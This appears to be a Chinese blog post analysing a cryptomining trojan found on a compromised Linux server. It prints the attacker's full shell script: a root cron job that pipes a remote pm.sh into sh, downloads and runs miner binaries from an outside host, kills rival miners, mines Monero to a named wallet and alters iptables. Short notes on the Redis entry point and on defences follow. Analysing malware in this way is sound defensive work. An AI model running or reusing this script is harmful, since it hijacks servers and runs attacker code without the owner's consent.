echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.217" ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
fi
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216


if [ -d "/opt/yam" ]; then
rm -rf /opt/yam
fi

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

#/opt/minerd -h
#if [ $? != "0" ]; then
#ps auxf|grep -v grep|grep "/opt/minerd"
#if [ $? != "0" ]; then
#if [ ! -f /opt/yam ]; then
#curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
#fi
#chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
#fi
#fi

DoMiner()
{
if [ ! -f "/tmp/AnXqV" ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
fi
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner


DoRedis6379()
{
iptables -F REDIS6379
iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
iptables -I INPUT -j REDIS6379
}
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限。


商业模式


被植入比特币“挖矿木马”的电脑,系统性能会受到较大影响,电脑操作会明显卡慢、散热风扇狂转;另一个危害在于,“挖矿木马”会大量耗电,并造成显卡、CPU等硬件急剧损耗。比特币具有匿名属性,其交易过程是不可逆的,被盗后根本无法查询是被谁盗取,流向哪里,因此也成为黑客的重点窃取对象。


攻击&防御


植入方式:安全防护策略薄弱,利用Jenkins、Redis等中间件的漏洞发起攻击,获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗(CPU/load)。
这种木马很容易变种,很多情况杀毒软件未必能够识别。